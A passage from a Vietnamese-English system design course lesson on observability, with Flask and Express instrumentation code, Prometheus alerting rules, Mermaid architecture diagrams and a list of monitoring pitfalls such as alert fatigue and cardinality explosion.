"http_request_duration_seconds",
"HTTP request duration in seconds",
["method", "path"],
buckets=[0.005, 0.01, 0.025, 0.05, 0.1, 0.25, 0.5, 1.0, 2.5, 5.0, 10.0]
)
REQUEST_SIZE = Histogram(
"http_request_size_bytes",
"HTTP request size in bytes",
["method", "path"],
buckets=[100, 500, 1000, 5000, 10000, 50000, 100000, 500000]
)
RESPONSE_SIZE = Histogram(
"http_response_size_bytes",
"HTTP response size in bytes",
["method", "path"],
buckets=[100, 500, 1000, 5000, 10000, 50000, 100000, 500000]
)
# Business metrics
PAYMENT_PROCESSED = Counter(
"payments_processed_total",
"Total payments processed",
["status", "method"] # status: success/failed, method: card/bank/wallet
)
PAYMENT_AMOUNT = Histogram(
"payment_amount_usd",
"Payment amount in USD",
["method"],
buckets=[1, 5, 10, 50, 100, 500, 1000, 5000, 10000]
)
# Resource metrics
ACTIVE_CONNECTIONS = Gauge(
"active_connections",
"Number of active connections"
)
DB_POOL_SIZE = Gauge(
"db_connection_pool_size",
"Database connection pool size",
["state"] # active, idle, waiting
)
# ============================================================
# 4. FLASK APP WITH INSTRUMENTATION
# ============================================================
app = Flask(__name__)
tracer = setup_tracing(app)
@app.before_request
def before_request():
g.start_time = time.time()
g.request_id = request.headers.get("X-Request-ID", "unknown")
ACTIVE_CONNECTIONS.inc()
@app.after_request
def after_request(response):
# Calculate duration
duration = time.time() - g.start_time
path = request.url_rule.rule if request.url_rule else request.path
# Record metrics
REQUEST_COUNT.labels(
method=request.method,
path=path,
status=response.status_code
).inc()
REQUEST_DURATION.labels(
method=request.method,
path=path
).observe(duration)
REQUEST_SIZE.labels(
method=request.method,
path=path
).observe(request.content_length or 0)
RESPONSE_SIZE.labels(
method=request.method,
path=path
).observe(response.content_length or 0)
ACTIVE_CONNECTIONS.dec()
# Structured access log
logger.info(
"Request completed",
extra={"extra_fields": {
"method": request.method,
"path": request.path,
"status_code": response.status_code,
"duration_ms": round(duration * 1000, 2),
"client_ip": request.remote_addr,
"user_agent": request.headers.get("User-Agent", ""),
"request_id": g.request_id,
}}
)
return response
@app.route("/api/v1/payments", methods=["POST"])
def process_payment():
"""Example endpoint with full instrumentation."""
with tracer.start_as_current_span("process_payment") as span:
try:
data = request.get_json()
amount = data.get("amount", 0)
method = data.get("payment_method", "card")
# Add span attributes (for trace context)
span.set_attribute("payment.amount", amount)
span.set_attribute("payment.method", method)
span.set_attribute("payment.currency", "USD")
# Simulate DB call
with tracer.start_as_current_span("db_insert_payment"):
time.sleep(0.02) # Simulate DB latency
# Simulate external payment gateway call
with tracer.start_as_current_span("call_payment_gateway") as gw_span:
gw_span.set_attribute("gateway.name", "stripe")
time.sleep(0.1) # Simulate gateway latency
# Record business metrics
PAYMENT_PROCESSED.labels(status="success", method=method).inc()
PAYMENT_AMOUNT.labels(method=method).observe(amount)
logger.info("Payment processed successfully", extra={"extra_fields": {
"payment_method": method,
"amount": amount,
"event": "payment_success",
}})
return {"status": "success", "transaction_id": "txn_abc123"}, 200
except Exception as e:
PAYMENT_PROCESSED.labels(status="failed", method=method).inc()
span.record_exception(e)
span.set_status(trace.StatusCode.ERROR, str(e))
logger.error("Payment processing failed", exc_info=True, extra={"extra_fields": {
"payment_method": method,
"amount": amount,
"event": "payment_failed",
}})
return {"status": "error", "message": "Payment failed"}, 500
@app.route("/metrics")
def metrics():
"""Prometheus metrics endpoint."""
return generate_latest(), 200, {"Content-Type": CONTENT_TYPE_LATEST}
@app.route("/health")
def health():
return {"status": "healthy"}, 200
if __name__ == "__main__":
logger.info("Starting payment service", extra={"extra_fields": {"event": "startup"}})
app.run(host="0.0.0.0", port=8082, debug=False)6.2 Node.js: Express App with Full Observability
/**
* Full observability instrumentation for a Node.js Express service.
* Includes: Prometheus metrics, structured logging (pino), OpenTelemetry tracing.
*/
// ============================================================
// 1. OPENTELEMETRY SETUP (must be first import!)
// ============================================================
const { NodeSDK } = require("@opentelemetry/sdk-node");
const {
OTLPTraceExporter,
} = require("@opentelemetry/exporter-trace-otlp-grpc");
const {
getNodeAutoInstrumentations,
} = require("@opentelemetry/auto-instrumentations-node");
const { Resource } = require("@opentelemetry/resources");
const {
SEMRESATTRS_SERVICE_NAME,
SEMRESATTRS_SERVICE_VERSION,
SEMRESATTRS_DEPLOYMENT_ENVIRONMENT,
} = require("@opentelemetry/semantic-conventions");
const sdk = new NodeSDK({
resource: new Resource({
[SEMRESATTRS_SERVICE_NAME]: "order-service",
[SEMRESATTRS_SERVICE_VERSION]: "1.5.0",
[SEMRESATTRS_DEPLOYMENT_ENVIRONMENT]: "production",
}),
traceExporter: new OTLPTraceExporter({
url: "grpc://otel-collector:4317",
}),
instrumentations: [
getNodeAutoInstrumentations({
"@opentelemetry/instrumentation-fs": { enabled: false }, // noisy
}),
],
});
sdk.start();
// ============================================================
// 2. STRUCTURED LOGGING (pino)
// ============================================================
const pino = require("pino");
const { trace, context } = require("@opentelemetry/api");
const logger = pino({
level: process.env.LOG_LEVEL || "info",
formatters: {
level(label) {
return { level: label };
},
},
mixin() {
// Inject trace context into every log line
const span = trace.getSpan(context.active());
if (span) {
const ctx = span.spanContext();
return {
trace_id: ctx.traceId,
span_id: ctx.spanId,
};
}
return {};
},
base: {
service: "order-service",
version: "1.5.0",
environment: "production",
},
// PII redaction paths
redact: {
paths: [
"req.headers.authorization",
"req.headers.cookie",
"body.password",
"body.credit_card",
"body.ssn",
"user.email",
],
censor: "[REDACTED]",
},
timestamp: pino.stdTimeFunctions.isoTime,
});
// ============================================================
// 3. PROMETHEUS METRICS
// ============================================================
const promClient = require("prom-client");
const { register } = promClient;
// Default metrics (Node.js runtime: event loop, GC, memory, etc.)
promClient.collectDefaultMetrics({
prefix: "nodejs_",
gcDurationBuckets: [0.001, 0.01, 0.1, 1, 2, 5],
});
// RED metrics
const httpRequestsTotal = new promClient.Counter({
name: "http_requests_total",
help: "Total number of HTTP requests",
labelNames: ["method", "path", "status"],
});
const httpRequestDuration = new promClient.Histogram({
name: "http_request_duration_seconds",
help: "HTTP request duration in seconds",
labelNames: ["method", "path"],
buckets: [0.005, 0.01, 0.025, 0.05, 0.1, 0.25, 0.5, 1, 2.5, 5, 10],
});
const httpRequestSize = new promClient.Histogram({
name: "http_request_size_bytes",
help: "HTTP request payload size",
labelNames: ["method", "path"],
buckets: [100, 500, 1000, 5000, 10000, 50000, 100000],
});
// Business metrics
const ordersCreated = new promClient.Counter({
name: "orders_created_total",
help: "Total orders created",
labelNames: ["status"],
});
const orderAmount = new promClient.Histogram({
name: "order_amount_usd",
help: "Order amount in USD",
buckets: [10, 50, 100, 500, 1000, 5000],
});
const activeWebSockets = new promClient.Gauge({
name: "active_websocket_connections",
help: "Number of active WebSocket connections",
});
// ============================================================
// 4. EXPRESS APP
// ============================================================
const express = require("express");
const app = express();
app.use(express.json());
// Metrics middleware
app.use((req, res, next) => {
const start = process.hrtime.bigint();
res.on("finish", () => {
const duration = Number(process.hrtime.bigint() - start) / 1e9;
const path = req.route?.path || req.path;
// Skip metrics endpoint from recording
if (path === "/metrics" || path === "/health") return;
httpRequestsTotal.inc({
method: req.method,
path: path,
status: res.statusCode,
});
httpRequestDuration.observe(
{ method: req.method, path: path },
duration
);
httpRequestSize.observe(
{ method: req.method, path: path },
parseInt(req.headers["content-length"] || "0", 10)
);
// Structured access log
logger.info({
msg: "Request completed",
method: req.method,
path: req.path,
status_code: res.statusCode,
duration_ms: Math.round(duration * 1000),
client_ip: req.ip,
request_id: req.headers["x-request-id"] || "unknown",
});
});
next();
});
// Routes
app.post("/api/v1/orders", async (req, res) => {
const tracer = trace.getTracer("order-service");
try {
const { items, total_amount } = req.body;
logger.info({
msg: "Processing new order",
items_count: items?.length,
total_amount,
event: "order_processing",
});
// Simulate order processing
await new Promise((resolve) => setTimeout(resolve, 50));
// Record business metrics
ordersCreated.inc({ status: "success" });
orderAmount.observe(total_amount || 0);
logger.info({
msg: "Order created successfully",
order_id: "ord_xyz789",
total_amount,
event: "order_created",
});
res.status(201).json({
status: "success",
order_id: "ord_xyz789",
});
} catch (err) {
ordersCreated.inc({ status: "failed" });
logger.error({
msg: "Order creation failed",
error: err.message,
stack: err.stack,
event: "order_failed",
});
res.status(500).json({ status: "error", message: "Order failed" });
}
});
// Prometheus metrics endpoint
app.get("/metrics", async (req, res) => {
res.set("Content-Type", register.contentType);
res.end(await register.metrics());
});
// Health check
app.get("/health", (req, res) => {
res.json({ status: "healthy", uptime: process.uptime() });
});
const PORT = process.env.PORT || 8083;
app.listen(PORT, () => {
logger.info({ msg: `Order service started on port ${PORT}`, event: "startup" });
});
// Graceful shutdown
process.on("SIGTERM", async () => {
logger.info({ msg: "Received SIGTERM, shutting down gracefully", event: "shutdown" });
await sdk.shutdown();
process.exit(0);
});6.3 Alerting Rules YAML (Prometheus)
prometheus/alert-rules.yml:
groups:
# ===========================================================
# GOLDEN SIGNALS ALERTS
# ===========================================================
- name: golden_signals
rules:
# --- LATENCY ---
- alert: HighP99Latency
expr: |
histogram_quantile(0.99,
sum by (le, service) (rate(http_request_duration_seconds_bucket[5m]))
) > 0.5
for: 5m
labels:
severity: high
category: performance
annotations:
summary: "P99 latency > 500ms for {{ $labels.service }}"
description: "P99 latency is {{ $value | humanizeDuration }} for service {{ $labels.service }}"
runbook_url: "https://wiki.internal/runbooks/high-latency"
- alert: CriticalP99Latency
expr: |
histogram_quantile(0.99,
sum by (le, service) (rate(http_request_duration_seconds_bucket[5m]))
) > 2.0
for: 2m
labels:
severity: critical
category: performance
annotations:
summary: "P99 latency > 2s for {{ $labels.service }}"
runbook_url: "https://wiki.internal/runbooks/critical-latency"
# --- ERRORS ---
- alert: HighErrorRate
expr: |
sum by (service) (rate(http_requests_total{status=~"5.."}[5m]))
/
sum by (service) (rate(http_requests_total[5m]))
> 0.01
for: 5m
labels:
severity: high
category: errors
annotations:
summary: "Error rate > 1% for {{ $labels.service }}"
description: "Error rate is {{ $value | humanizePercentage }} for service {{ $labels.service }}"
runbook_url: "https://wiki.internal/runbooks/high-error-rate"
- alert: CriticalErrorRate
expr: |
sum by (service) (rate(http_requests_total{status=~"5.."}[5m]))
/
sum by (service) (rate(http_requests_total[5m]))
> 0.05
for: 2m
labels:
severity: critical
category: errors
annotations:
summary: "Error rate > 5% for {{ $labels.service }}"
runbook_url: "https://wiki.internal/runbooks/critical-error-rate"
# --- TRAFFIC ---
- alert: TrafficAnomaly
expr: |
sum(rate(http_requests_total[5m]))
>
2 * avg_over_time(sum(rate(http_requests_total[5m]))[7d:1h])
for: 10m
labels:
severity: warning
category: traffic
annotations:
summary: "Traffic is 2x above 7-day average"
description: "Current QPS: {{ $value | humanize }}. Could be organic growth or DDoS."
- alert: ZeroTraffic
expr: sum(rate(http_requests_total[5m])) == 0
for: 5m
labels:
severity: critical
category: traffic
annotations:
summary: "Zero traffic detected — possible total outage"
runbook_url: "https://wiki.internal/runbooks/zero-traffic"
# --- SATURATION ---
- alert: HighCPUUsage
expr: |
100 - (avg by (instance) (rate(node_cpu_seconds_total{mode="idle"}[5m])) * 100) > 85
for: 10m
labels:
severity: warning
category: saturation
annotations:
summary: "CPU usage > 85% on {{ $labels.instance }}"
- alert: HighMemoryUsage
expr: |
(1 - node_memory_MemAvailable_bytes / node_memory_MemTotal_bytes) * 100 > 90
for: 5m
labels:
severity: high
category: saturation
annotations:
summary: "Memory usage > 90% on {{ $labels.instance }}"
- alert: DiskSpaceLow
expr: |
(1 - node_filesystem_avail_bytes{mountpoint="/"} / node_filesystem_size_bytes{mountpoint="/"}) * 100 > 85
for: 15m
labels:
severity: warning
category: saturation
annotations:
summary: "Disk usage > 85% on {{ $labels.instance }}"
description: "Disk will be full in {{ $value | humanizeDuration }} at current rate"
- alert: DiskWillFillIn7Days
expr: |
predict_linear(node_filesystem_avail_bytes{mountpoint="/"}[7d], 7*24*3600) < 0
for: 1h
labels:
severity: high
category: saturation
annotations:
summary: "Disk predicted to fill within 7 days on {{ $labels.instance }}"
# ===========================================================
# SLO-BASED BURN RATE ALERTS
# ===========================================================
- name: slo_burn_rate
rules:
# SLO: 99.9% availability (error budget = 0.1%)
# Burn rate 14.4x → budget exhausted in ~2 days
- alert: SLOBurnRateCritical
expr: |
(
sum(rate(http_requests_total{status=~"5.."}[5m]))
/
sum(rate(http_requests_total[5m]))
) > (14.4 * 0.001)
and
(
sum(rate(http_requests_total{status=~"5.."}[1h]))
/
sum(rate(http_requests_total[1h]))
) > (14.4 * 0.001)
for: 2m
labels:
severity: critical
category: slo
annotations:
summary: "SLO burn rate > 14.4x — error budget exhausts in ~2 days"
runbook_url: "https://wiki.internal/runbooks/slo-burn-rate"
# Burn rate 6x → budget exhausted in ~5 days
- alert: SLOBurnRateHigh
expr: |
(
sum(rate(http_requests_total{status=~"5.."}[30m]))
/
sum(rate(http_requests_total[30m]))
) > (6 * 0.001)
and
(
sum(rate(http_requests_total{status=~"5.."}[6h]))
/
sum(rate(http_requests_total[6h]))
) > (6 * 0.001)
for: 5m
labels:
severity: high
category: slo
annotations:
summary: "SLO burn rate > 6x — error budget exhausts in ~5 days"
# ===========================================================
# SECURITY ALERTS
# ===========================================================
- name: security_alerts
rules:
- alert: HighRateOf401
expr: |
sum(rate(http_requests_total{status="401"}[5m])) > 50
for: 2m
labels:
severity: high
category: security
annotations:
summary: "High rate of 401 Unauthorized — possible brute force attack"
runbook_url: "https://wiki.internal/runbooks/auth-attack"
- alert: HighRateOf403
expr: |
sum(rate(http_requests_total{status="403"}[5m])) > 100
for: 2m
labels:
severity: high
category: security
annotations:
summary: "High rate of 403 Forbidden — possible enumeration attack"
- alert: SuspiciousTrafficSpike
expr: |
sum(rate(http_requests_total[1m]))
>
5 * avg_over_time(sum(rate(http_requests_total[1m]))[1d:5m])
for: 5m
labels:
severity: critical
category: security
annotations:
summary: "Traffic spike 5x above daily average — possible DDoS"
runbook_url: "https://wiki.internal/runbooks/ddos-response"
# ===========================================================
# MONITORING THE MONITORING (Meta-monitoring)
# ===========================================================
- name: meta_monitoring
rules:
- alert: PrometheusTargetDown
expr: up == 0
for: 3m
labels:
severity: high
category: monitoring
annotations:
summary: "Prometheus target {{ $labels.instance }} is down"
- alert: PrometheusStorageFull
expr: |
prometheus_tsdb_storage_blocks_bytes / (50 * 1024^3) > 0.85
for: 15m
labels:
severity: warning
category: monitoring
annotations:
summary: "Prometheus storage > 85% of 50GB limit"
- alert: AlertmanagerNotificationFailed
expr: |
rate(alertmanager_notifications_failed_total[5m]) > 0
for: 5m
labels:
severity: high
category: monitoring
annotations:
summary: "Alertmanager failing to send notifications via {{ $labels.integration }}"
- alert: HighCardinalitySeries
expr: prometheus_tsdb_head_series > 500000
for: 15m
labels:
severity: warning
category: monitoring
annotations:
summary: "Prometheus tracking {{ $value }} active series — cardinality may be too high"7. Mermaid Diagrams
7.1 Observability Stack Architecture
flowchart TB subgraph "Application Layer" A1[Service A<br/>Python/Flask] A2[Service B<br/>Node.js/Express] A3[Service C<br/>Go/Gin] end subgraph "Collection Layer" direction TB P[Prometheus<br/>Scrapes /metrics<br/>every 15s] OC[OpenTelemetry<br/>Collector] FB[Filebeat<br/>Log Shipper] end subgraph "Processing Layer" LS[Logstash<br/>Parse · Filter PII<br/>Transform · Enrich] end subgraph "Storage Layer" TSDB[(Prometheus TSDB<br/>Metrics · 30d)] ES[(Elasticsearch<br/>Logs · 90d)] JG[(Jaeger<br/>Traces · 7d)] end subgraph "Visualization Layer" GR[Grafana<br/>Dashboards] KB[Kibana<br/>Log Search] JU[Jaeger UI<br/>Trace Explorer] end subgraph "Alerting Layer" AM[Alertmanager<br/>Route · Group · Dedup] PD[PagerDuty<br/>Escalation] SL[Slack<br/>Notifications] EM[Email<br/>Reports] end %% Data Flow A1 & A2 & A3 -->|"/metrics"| P A1 & A2 & A3 -->|"OTLP gRPC"| OC A1 & A2 & A3 -->|"stdout/files"| FB P -->|"store"| TSDB OC -->|"traces"| JG OC -->|"metrics"| TSDB FB -->|"ship"| LS LS -->|"index"| ES TSDB --> GR ES --> KB ES --> GR JG --> JU JG --> GR P -->|"alert rules"| AM AM --> PD AM --> SL AM --> EM style P fill:#e65100,stroke:#333,color:#fff style GR fill:#f9a825,stroke:#333 style AM fill:#c62828,stroke:#333,color:#fff style OC fill:#1565c0,stroke:#333,color:#fff style ES fill:#2e7d32,stroke:#333,color:#fff
7.2 Alert Escalation Flow
flowchart TD A[Prometheus<br/>Alert Rule Fires] --> B{Alertmanager<br/>Receives Alert} B --> C{Severity?} C -->|P1 Critical| D[PagerDuty<br/>+ Slack #incidents] C -->|P2 High| E[Slack #incidents] C -->|P3 Warning| F[Slack #alerts] C -->|P4 Info| G[Email / Dashboard] D --> H{On-call Primary<br/>Ack in 5min?} H -->|Yes| I[Primary Investigates] H -->|No| J{On-call Secondary<br/>Ack in 10min?} J -->|Yes| K[Secondary Investigates] J -->|No| L{Engineering Manager<br/>Ack in 15min?} L -->|Yes| M[Manager Coordinates] L -->|No| N[VP/CTO Notified<br/>War Room Opened] I --> O{Resolved?} K --> O M --> O N --> O O -->|Yes| P[Alertmanager sends<br/>RESOLVED notification] O -->|No, > 30 min| Q[Incident Commander<br/>Declared] P --> R[Postmortem<br/>within 48h] Q --> S[Cross-team Response<br/>Status Page Updated] S --> O E --> T[On-call Reviews<br/>within 30min] F --> U[Team Reviews<br/>within 4h] style D fill:#c62828,stroke:#333,color:#fff style N fill:#c62828,stroke:#333,color:#fff style P fill:#2e7d32,stroke:#333,color:#fff style Q fill:#e65100,stroke:#333,color:#fff
7.3 Request Lifecycle with Observability
sequenceDiagram participant U as User participant GW as API Gateway participant OS as Order Service participant PS as Payment Service participant DB as Database participant P as Prometheus participant L as Logstash/ES participant J as Jaeger Note over U,J: trace_id: abc-123 propagated via W3C headers U->>GW: POST /api/orders activate GW Note right of GW: span_id: s1<br/>Log: "Received request"<br/>Metric: request_count++ GW->>OS: Forward + traceparent header activate OS Note right of OS: span_id: s2 (parent: s1)<br/>Log: "Processing order"<br/>Metric: order_count++ OS->>PS: POST /internal/payments activate PS Note right of PS: span_id: s3 (parent: s2)<br/>Log: "Processing payment" PS->>DB: INSERT payment activate DB Note right of DB: span_id: s4 (parent: s3)<br/>Metric: db_query_duration DB-->>PS: OK deactivate DB PS-->>OS: Payment confirmed deactivate PS OS-->>GW: Order created deactivate OS GW-->>U: 201 Created deactivate GW Note over P: Scrapes /metrics every 15s<br/>Records: latency, QPS, errors Note over L: Receives structured logs<br/>Indexes in Elasticsearch Note over J: Receives trace spans<br/>Builds trace waterfall view
8. Aha Moments & Pitfalls
Aha Moment #1: Alert Fatigue kills Monitoring
Nếu on-call engineer nhận 100 alerts/ngày, sau 2 tuần họ sẽ ignore tất cả — kể cả alert thật sự critical. Đây gọi là alert fatigue (mệt mỏi cảnh báo), và nó đã gây ra nhiều outage nghiêm trọng thực tế (AWS, Google đều từng document).
Giải pháp: Mỗi alert phải actionable (có thể hành động). Nếu alert fires mà engineer không cần làm gì → xoá alert đó. Target: < 5 pages/tuần cho mỗi on-call rotation.
Aha Moment #2: Monitoring the Monitoring
Điều gì xảy ra khi Prometheus chết? Không có alert nào fires cả — vì Prometheus chính là hệ thống gửi alert! Đây là meta-monitoring problem.
Giải pháp:
- Dùng Deadman’s switch: Prometheus gửi heartbeat alert mỗi 1 phút. Nếu PagerDuty không nhận heartbeat trong 5 phút → alert “Prometheus is down”
- Chạy 2 Prometheus instances cross-monitor nhau
- Dùng managed monitoring (Datadog, Grafana Cloud) làm backup cho self-hosted Prometheus
Aha Moment #3: Cardinality Explosion — Silent Killer
Một developer thêm
user_idlàm label cho metric → 10M users = 10M time series. Prometheus OOM crash lúc 3AM. Không có alert (vì Prometheus đã chết — xem Aha #2).Prevention:
- Code review cho mọi metric changes
- Alert khi
prometheus_tsdb_head_series > threshold- Enforce label whitelist trong Prometheus relabeling config
- Dùng recording rules để pre-aggregate high-cardinality metrics
Aha Moment #4: Log Volume = Money
Với 10K QPS, log 5 lines/request = 4.32B log lines/day = 2.16TB raw/day. Elasticsearch storage cho 90 ngày = 64TB. Trên AWS, 64TB EBS gp3 = ~$5,120/month CHỈ cho storage (chưa kể compute cho ES nodes).
Giải pháp thực tế:
- Log levels: Production default = WARN. Chỉ bật DEBUG cho specific service khi troubleshooting
- Sampling: Log 10% của successful requests, 100% của errors
- Tiered storage: Hot (SSD, 7 ngày) → Warm (HDD, 30 ngày) → Cold (S3, 1 năm) → Delete
- Loki thay Elasticsearch: Index chỉ labels, không full-text → 10x cheaper storage
- Log aggregation: Thay vì log mỗi request, aggregate thành metrics (rate, error count, latency percentiles)
Pitfall #1: Quên correlate giữa 3 pillars
Metrics cho thấy latency tăng. Logs cho thấy “timeout error”. Nhưng không biết liên quan thế nào vì không có trace_id chung giữa metrics → logs → traces.
Fix: Exemplar (Prometheus + Grafana Tempo). Từ metrics chart, click vào data point → jump thẳng tới trace → từ trace, click vào span → jump tới logs. Tất cả qua trace_id.
Pitfall #2: Dashboard quá nhiều panels
Dashboard 50 panels = không ai đọc. Giống cockpit máy bay — phi công nhìn 6 đồng hồ chính, không phải 500 đồng hồ.
Fix: Mỗi dashboard tối đa 10-12 panels. Tổ chức theo hierarchy: Overview → Service → Instance. Dùng drill-down links giữa các dashboards.
Pitfall #3: Alert trên symptoms, không trên causes
Sai: Alert khi CPU > 80%. CPU có thể cao vì batch job chạy đúng lịch — hoàn toàn bình thường.
Đúng: Alert khi P99 latency > SLO threshold. Nếu CPU 90% mà latency vẫn < 200ms → không cần page ai cả.
Pitfall #4: Không có runbook
Alert fires lúc 3AM. On-call engineer mới join team 2 tuần. Alert message: “HighErrorRate”. Không có link runbook. Engineer mất 45 phút để tìm hiểu context trước khi bắt đầu fix.
Fix: Mọi alert PHẢI có
runbook_urlannotation. Runbook chứa: (1) Alert nghĩa là gì, (2) Impact, (3) Steps to investigate, (4) Common fixes, (5) Escalation path.
Pitfall #5: Pre-aggregate metrics cho debugging chi tiết
Metric P99 latency tăng → không biết user nào, request gì, deploy nào gây ra. Pre-aggregated → mất detail.
Fix: Cho debugging path, dùng high-cardinality structured events (OpenTelemetry traces với rich attributes hoặc Honeycomb-style). Tham chiếu section 2.11. Metrics cho dashboard, events cho drill-down.
Pitfall #6: Instrument application code cho mọi metric
Add OpenTelemetry SDK → 5% performance overhead, language-specific libraries, miss kernel-level issues (TCP retransmits, syscall delay).
Fix: Dùng eBPF observability (Pixie, Cilium Hubble, Parca) cho infrastructure/network. Application SDK chỉ cho business logic. Tham chiếu section 2.12.
Pitfall #7: Sampling 100% traces ở production
Trace data lớn → 1TB/day → cost nhanh chóng vượt revenue.
Fix: Tail-based sampling — keep 100% errors + 100% slow requests + 1% normal. Dùng OpenTelemetry Collector tail-sampler hoặc DataDog Live Search.
9. Internal Links — Liên kết kiến thức
| Topic | Link | Mối liên hệ |
|---|---|---|
| Estimation | Tuan-02-Back-of-the-envelope | Dùng estimation để tính alert threshold, storage sizing cho monitoring stack |
| Networking | Tuan-03-Networking-DNS-CDN | Monitor DNS resolution time, CDN cache hit rate, network latency |
| API Design | Tuan-04-API-Design-REST-gRPC | Instrument API endpoints với RED metrics, structured logging per endpoint |
| Load Balancer | Tuan-05-Load-Balancer | Monitor LB health, connection distribution, backend health checks |
| Cache | Tuan-06-Cache-Strategy | Monitor cache hit rate, eviction rate, memory usage → critical SLI |
| Database | Tuan-07-Database-Sharding-Replication | Monitor replication lag, query latency, connection pool saturation |
| Message Queue | Tuan-08-Message-Queue | Monitor consumer lag, queue depth, dead letter queue size |
| Rate Limiter | Tuan-09-Rate-Limiter | Security alerts cho rate limit violations, DDoS detection |
| Consistent Hashing | Tuan-10-Consistent-Hashing | Monitor hash ring rebalancing, hotspot detection |
| Microservices | Tuan-11-Microservices-Pattern | Distributed tracing across services, service mesh observability |
| CI/CD | Tuan-12-CICD-Pipeline | Deploy frequency tracking, change failure rate (DORA metrics) |
| AuthN/AuthZ | Tuan-14-AuthN-AuthZ-Security | Monitor failed auth attempts, token expiration, permission denials |
| Data Security | Tuan-15-Data-Security-Encryption | Audit log monitoring, PII detection, encryption key rotation alerts |
| URL Shortener | Tuan-16-Design-URL-Shortener | Case study: monitor redirect latency, cache hit rate, storage growth |
| Chat System | Tuan-17-Design-Chat-System | Case study: monitor WebSocket connections, message delivery latency |
| Notification | Tuan-19-Design-Notification-System | Case study: monitor delivery rate, push notification latency, failure rate |
Tham khảo
- Alex Xu, System Design Interview — Chapter on Monitoring & Logging
- Google SRE Book — Chapters: Monitoring Distributed Systems, Service Level Objectives, Practical Alerting
- Betsy Beyer et al., Site Reliability Engineering (O’Reilly)
- Charity Majors et al., Observability Engineering (O’Reilly)
- Brendan Gregg, Systems Performance — USE Method
- Tom Wilkie, RED Method — https://grafana.com/blog/2018/08/02/the-red-method-how-to-instrument-your-services/
- OpenTelemetry Documentation — https://opentelemetry.io/docs/
- Prometheus Documentation — https://prometheus.io/docs/
- sdi.anhvy.dev — Vietnamese System Design Reference
- Tuan-12-CICD-Pipeline — CI/CD pipeline (tuần trước)
- Tuan-14-AuthN-AuthZ-Security — Authentication & Authorization (tuần sau)
Tuần trước: Tuan-12-CICD-Pipeline — CI/CD Pipeline Tuần sau: Tuan-14-AuthN-AuthZ-Security — Authentication & Authorization Security